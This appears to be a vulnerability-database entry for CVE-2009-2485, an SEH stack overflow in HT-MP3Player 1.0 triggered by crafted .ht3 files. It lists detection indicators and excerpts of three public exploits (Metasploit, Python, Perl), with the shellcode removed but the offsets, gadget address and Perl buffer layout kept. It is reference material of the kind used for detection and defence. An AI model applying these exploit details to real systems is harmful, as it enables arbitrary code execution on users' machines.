CVE-2009-2485
Published 2009-07-16
CVE-2009-2485: Stack-based buffer overflow in HT-MP3Player 1.0 allows remote attackers to execute arbitrary code via a long string in a .ht3 file.
Priority: P3 · 48 · critical · CVSS 2.0 base score 9.3 (AV:N/AC:M/Au:N/C:C/I:C/A:C)
Exploit available · EPSS 58.10% (99.0th percentile)
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| tingan | ht-mp3player | — | — |
Detection & IOCs (extracted from sources)
- Stack-based SEH buffer overflow triggered by a malicious .ht3 file; 4108 bytes of data are written before the SEH record is overwritten.
- Exploit payload space is 4108 bytes; bad characters include the null byte, LF, CR, and bytes 0x80–0xCF, so the payload must be AlphanumMixed-encoded: detect alphanumeric-encoded shellcode in .ht3 files.
- The exploit uses a pop/pop/ret gadget at 0x00406cff inside HTMP3Player.exe to pivot SEH execution; monitor for SEH-based exploitation of this process.
- Crash/exploitation can be detected by a read from address 0xf0f0f0f0 at offset 4096 within the .ht3 payload buffer.
- The .ht3 file type is not registered by the HT-MP3Player installer; a user must manually load the file, indicating a social-engineering delivery vector to watch for.
- The universal exploit prefixes the payload buffer with the ASCII string 'D_Z' before the shellcode; this marker can be used as a file-content signature for malicious .ht3 files.
- The Metasploit module targets only HT-MP3Player 1.0 on Windows; no other versions or platforms are listed as targets.
No detection rules found.
Exploit-DB · 2010-04-30
HT-MP3Player 1.0 - '.HT3' File Parsing Buffer Overflow (Metasploit)
---
```ruby
##
# $Id: ht_mp3player_ht3_bof.rb 9179 2010-04-30 08:40:19Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

# The class header below is reconstructed: the HTML extraction swallowed
# everything between "Metasploit3 <" and "'Name' =>" as if it were a tag.
class Metasploit3 < Msf::Exploit::Remote

  include Msf::Exploit::FILEFORMAT

  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'HT-MP3Player 1.0 HT3 File Parsing Buffer Overflow',
      'Description' => %q{
          This module exploits a stack buffer overflow in HT-MP3Player 1.0.
        Arbitrary code execution could occur when parsing a specially crafted
        .HT3 file.
        NOTE: The player installation does not register the file type to be
        handled. Therefore, a user must take extra steps to load this file.
      }
      # The remaining info entries (references, payload constraints, targets)
      # and the exploit method are not included in this excerpt.
    ))
  end
end
```
Exploit-DB · 2009-06-29
HT-MP3Player 1.0 - '.ht3' Universal Buffer Overflow (SEH)
---
```python
# usage: exploit.py
print("**************************************************************************")
print(" HT-MP3Player 1.0 (.ht3) Universal Buffer Overflow (SEH)\n")
print(" Original author: hack4love<=(my friend)\n")
print(" Universal exploit : His0k4\n")
print(" Tested on: Windows XP Pro SP3 (EN)\n")
print(" greetz: All friends (DZ),sec-r1z.com\n")
print("**************************************************************************")
# win32_exec - EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com
shellcode = (
    # 343-byte PexAlphaNum-encoded payload omitted here (opaque hex blob;
    # the source listing is also cut off partway through it)
)
# The remainder of the script (buffer assembly and the .ht3 file write) is
# not included in this excerpt.
```
Exploit-DB · 2009-06-29
HT-MP3Player 1.0 - '.ht3' Local Buffer Overflow (SEH)
---
```perl
#!/usr/bin/perl
# by hack4love
# [email protected]
# HT-MP3Player 1.0 (.ht3 File) Local buffer Overflow (seh)
# # Greetz to all my friends
# from egypt
## easy :d
## Tested on: Windows XP Pro SP2 (EN)
##########################################################
my $bof = "\x41" x 4108;        # filler up to the SEH record (offset 4108)
my $nsh = "\xEB\x06\x90\x90";   # next-SEH pointer: short jump over the handler
my $seh = "\xbe\x2e\xd1\x72";   # SEH handler address overwrite (XP SP2 test box)
my $nop = "\x90" x 20;          # NOP sled
my $sec =
    # 343-byte PexAlphaNum-encoded payload omitted (opaque hex blob; the
    # source listing is cut off partway through it)
    "";
# The remainder of the script (buffer assembly and the .ht3 file write) is
# not included in this excerpt.
```
Metasploit
HT-MP3Player 1.0 HT3 File Parsing Buffer Overflow
This module exploits a stack buffer overflow in HT-MP3Player 1.0. Arbitrary code execution could occur when parsing a specially crafted .HT3 file. NOTE: The player installation does not register the file type to be handled. Therefore, a user must take extra steps to load this file.
No writeups or analysis indexed.
Published: 2009-07-16